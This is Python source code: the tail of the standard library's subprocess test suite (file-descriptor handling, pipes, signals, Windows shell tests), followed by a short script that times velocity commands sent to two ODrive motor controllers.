# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipIf(not ctypes, 'ctypes module required')
@unittest.skipIf(not sys.executable, 'Test requires sys.executable')
def test_child_terminated_in_stopped_state(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
PTRACE_TRACEME = 0 # From glibc and MacOS (PT_TRACE_ME).
libc_name = ctypes.util.find_library('c')
libc = ctypes.CDLL(libc_name)
if not hasattr(libc, 'ptrace'):
raise unittest.SkipTest('ptrace() required')
code = textwrap.dedent(f"""
import ctypes
import faulthandler
from test.support import SuppressCrashReport
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
""")
child = subprocess.Popen([sys.executable, '-c', code])
if child.wait() != 0:
raise unittest.SkipTest('ptrace() failed - unable to test')
code += textwrap.dedent(f"""
with SuppressCrashReport():
# Crash the process
faulthandler._sigsegv()
""")
child = subprocess.Popen([sys.executable, '-c', code])
try:
returncode = child.wait()
except:
child.kill() # Clean up the hung stopped process.
raise
self.assertNotEqual(0, returncode)
self.assertLess(returncode, 0) # signal death, likely SIGSEGV.
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises((FileNotFoundError, PermissionError)) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
timing_test.py
|
import odrive
import time
import math
import threading
thread_active = True
serial_a = "208239904D4D" #String containing front ODrive's serial number in hex format all capitals
serial_b = "206039994D4D" #String containing back ODrive's serial number in hex format all capitals
odrv = odrive.find_any(serial_number=serial_a)
odrv_b= odrive.find_any(serial_number=serial_b)
axis = odrv.axis0
axis_thread = odrv.axis0
def thread_test():
x=1
loops = 0
thread_start_time = time.perf_counter()
while thread_active:
x=1
axis_thread.controller.input_vel = x
measured = axis_thread.controller.input_vel
x=2
axis_thread.controller.input_vel = x
measured = axis_thread.controller.input_vel
loops+=2
thread_average_time_taken = (time.perf_counter()-thread_start_time)/loops
print(f"Thread performed {loops} loops with average of {thread_average_time_taken}s")
print()
print()
print()
x = 1
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = -1
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = 1.1
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = 1.0000001
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = 2.314141525321241513523253415623542783542678542678354254254267354
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
x = math.pi
start = time.perf_counter()
axis.controller.input_vel = x
taken = time.perf_counter()-start
print(f"Time taken for x: {x} is: {taken}s")
start = time.perf_counter()
measured = axis.controller.input_vel
taken = time.perf_counter()-start
print(f"Time taken to measure val: {measured} is: {taken}s")
print()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
print(f"Average time taken 1000 loops is: {taken}s")
print()
thread = threading.Thread(target=thread_test)
thread.start()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
thread_active = False
thread.join()
print(f"Average time taken 1000 loops with obstruction thread is: {taken}s")
print()
thread_active = True
axis_thread = odrv.axis1
thread = threading.Thread(target=thread_test)
thread.start()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
thread_active = False
thread.join()
print(f"Average time taken 1000 loops with obstruction thread is: {taken}s")
print()
axis_thread = odrv_b.axis0
thread_active = True
thread = threading.Thread(target=thread_test)
thread.start()
start = time.perf_counter()
for i in range(1000):
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/2000
thread_active = False
thread.join()
print(f"Average time taken 1000 loops with obstruction thread on other drive is: {taken}s")
print()
start = time.perf_counter()
for i in range(1000):
axis = odrv.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/8000
print(f"Average time taken 1000 changing drive loops is: {taken}s")
print()
start = time.perf_counter()
for i in range(1000):
axis = odrv.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis0
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
axis = odrv_b.axis1
axis.controller.input_vel = i/1000
measured = axis.controller.input_vel
taken = (time.perf_counter()-start)/8000
